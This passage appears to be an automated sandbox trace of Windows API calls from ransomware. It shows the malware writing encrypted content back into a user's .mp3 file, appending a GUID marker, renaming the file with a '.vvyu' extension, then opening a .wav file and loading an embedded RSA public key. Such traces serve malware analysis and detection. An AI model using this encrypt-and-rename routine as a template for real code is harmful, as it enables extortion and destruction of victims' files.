UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.895] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0190.895] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9450) returned 0x2d45778 [0190.895] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30a30 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d306d0 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.896] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0190.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0190.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0190.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c40 [0190.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39c28 [0190.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0190.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0190.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0190.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0190.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0190.900] GetCurrentThreadId () returned 0x264 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44b40 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.901] GetCurrentThreadId () returned 0x264 [0190.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0190.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0190.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c40 [0190.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0190.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ca0 [0190.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0190.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0190.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0190.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cb8 [0190.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0190.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c58 [0190.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0190.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0190.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c28 [0190.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0190.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0190.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0190.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d306d0 | out: hHeap=0x6a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0190.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.914] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x9440, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x9440, lpOverlapped=0x0) returned 1 [0190.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.915] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9445, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.915] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0190.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0190.982] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.983] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.983] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.983] CloseHandle (hObject=0x584) returned 1 [0191.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0191.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0191.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0191.052] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\QwaTwvQX1o7erS.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\qwatwvqx1o7ers.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\QwaTwvQX1o7erS.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\qwatwvqx1o7ers.mp3.vvyu")) returned 1 [0191.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0191.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0191.054] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0191.069] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ba8060, ftCreationTime.dwHighDateTime=0x1d8970e, ftLastAccessTime.dwLowDateTime=0x2bd93e20, ftLastAccessTime.dwHighDateTime=0x1d8a658, ftLastWriteTime.dwLowDateTime=0x2bd93e20, ftLastWriteTime.dwHighDateTime=0x1d8a658, nFileSizeHigh=0x0, nFileSizeLow=0x6b73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yn5TngP_hrElfEBI9s.wav", cAlternateFileName="YN5TNG~1.WAV")) returned 1 [0191.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0191.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0191.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0191.097] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\Yn5TngP_hrElfEBI9s.wav") returned=".wav" [0191.108] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\Yn5TngP_hrElfEBI9s.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\yn5tngp_hrelfebi9s.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.110] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=27507) returned 1 [0191.110] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0191.123] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6b4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.123] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0191.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0191.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0191.153] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.153] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x6b73, lpOverlapped=0x0) returned 1 [0191.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0191.154] lstrlenA (lpString="-----BEGIN PUBLIC 